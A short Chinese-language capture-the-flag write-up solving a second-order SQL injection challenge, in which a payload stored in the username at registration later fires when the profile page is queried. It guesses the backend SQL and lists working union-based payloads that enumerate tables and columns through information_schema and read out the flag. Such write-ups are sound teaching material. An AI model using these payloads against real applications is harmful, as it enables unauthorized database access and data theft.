[October 2019]Twice SQL Injection

简介

这是一个sql二次注入的题。所谓二次注入就是先在非注入点构造payload，程序会存储这个payload。然后程序会在注入点调用这个payload进行数据库操作。

详解

1. 打开首页，是一个登录页面，还有个注册按钮。

2023-07-26T03:15:11.png

1. 随便注册一个用户名，然后登录。页面会显示个人简介，且可以修改个人简介。

2023-07-26T03:18:06.png

1. 这个个人简介应该是默认的。尝试重新注册新账号登录还是这句话，修改个人简介，重新登录，发现不是默认的，个人简介应该是存储在数据库中的。
2. 尝试简单注入，构造payload' or 1=1#。发现单引号被转义。

2023-07-26T03:22:46.png

1. 联想题目二次注入，开始猜测以下所使用的sql语句。

--注册
insert into user values('用户名','密码','十月太懒，没有简介');
--登录
select * from user where 用户名='用户名' and 密码='密码';、
--登录之后会显示个人简介
select 个人简介 from user where 用户名='用户名';

1. 简单联想后发现，自己输入的用户名和密码都会被再次调用。但是个人简介会回显到页面，所以用户名应该是用来存储payload，然后在个人简介调用payload。
2. 只看select 个人简介 from user where 用户名='用户名';sql语句构造payload即可。
3. 简单构造payloadzz' union select 1#，尝试是否成功。

2023-07-26T03:35:16.png

2023-07-26T03:35:46.png

2023-07-26T03:36:08.png

1. 页面成功回显1，而不是默认简介，发现注入成功。继续构造payload寻找flag。

--查询表名
1' union select group_concat(table_name) from information_schema.tables where table_schema=database()#
--查询flag列名
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
--查询flag
1' union select flag from flag#